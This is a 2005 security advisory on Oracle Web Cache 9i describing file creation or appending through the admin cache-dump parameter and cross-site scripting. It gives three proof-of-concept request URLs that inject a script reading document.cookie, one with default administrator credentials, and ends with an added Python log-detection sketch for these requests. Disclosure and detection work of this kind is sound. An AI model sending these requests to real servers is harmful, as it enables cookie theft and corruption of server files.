Append file in Oracle Webcache 9i
Details
Many parameters are vulnerable to XSS/CSS attacks. Together with this bug it is possible to corrupt an Oracle Application Server installation.

Patch Information
Oracle fixed this issue with informing me or their customers.

Testcase
http://server01:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_replace_file.txt<script>alert(document.cookie);</script>
http://server01:4000/webcacheadmin?SCREEN_ID=CGA.Site.ApologyPages_Edit&ACTION=Submit&PartialPageErrorPage=/inservice.html<script>alert(document.cookie)</script>&site_id=2
http://administrator:administrator@server01:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_append_file.txt<script>alert(document.cookie);</script>

History
23-sep-2003 Oracle secalert was informed
23-sep-2003 Bug confirmed
26-apr-2005 Red-Database-Security published this advisory
11-may-2005 CAN added

© 2005 by Red-Database-Security GmbH - last update 03-nov-2005
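For reviewing Web Cache admin-port access logs against the test cases above, the following is an added detection sketch (not part of the original advisory and not Oracle code). It assumes Common Log Format lines that record the full query string; the function names, rule labels and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def parse_params(query):
    """Split on '&' only, so a ';' inside a value stays part of that value."""
    params = {}
    for pair in filter(None, query.split("&")):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params

def check_line(line):
    """Return (rule, parameter) findings for one access-log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if url.path != "/webcacheadmin":
        return []
    params = parse_params(url.query)
    # Rule 1: a decoded value carries markup characters, as in the XSS test cases.
    findings = [("markup", k) for k, v in params.items() if "<" in v or ">" in v]
    # Rule 2: the cache-dump screen was given a caller-chosen file path.
    if params.get("SCREEN_ID") == "CGA.CacheDump" and params.get("cache_dump_file"):
        findings.append(("dump-file", "cache_dump_file"))
    return findings

def scan(lines):
    """Map 1-based line number -> findings, skipping clean lines."""
    results = {}
    for number, line in enumerate(lines, 1):
        found = check_line(line)
        if found:
            results[number] = found
    return results

# Constructed sample log lines (the log format is an assumption).
_PFX = '192.0.2.10 - - [01/Jan/2005:10:00:00 +0000] "GET '
SAMPLE_LOG = [
    _PFX + '/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1'
           '&cache_dump_file=/tmp/dump.txt%3Cscript%3Ealert(1);%3C/script%3E HTTP/1.1" 200 812',
    _PFX + '/webcacheadmin?SCREEN_ID=CGA.Site.ApologyPages_Edit&ACTION=Submit'
           '&PartialPageErrorPage=/inservice.html%3Cscript%3Ealert(1)%3C/script%3E&site_id=2 HTTP/1.1" 200 640',
    _PFX + '/webcacheadmin?SCREEN_ID=CGA.Site.ApologyPages_Edit&ACTION=Submit'
           '&PartialPageErrorPage=/inservice.html&site_id=2 HTTP/1.1" 200 640',
    _PFX + '/index.html?q=%3Cb%3E HTTP/1.1" 200 120',
]
```

Calling `scan(SAMPLE_LOG)` flags the first two lines; a "dump-file" hit without a "markup" hit still deserves review, because it records which path the admin interface was asked to write to.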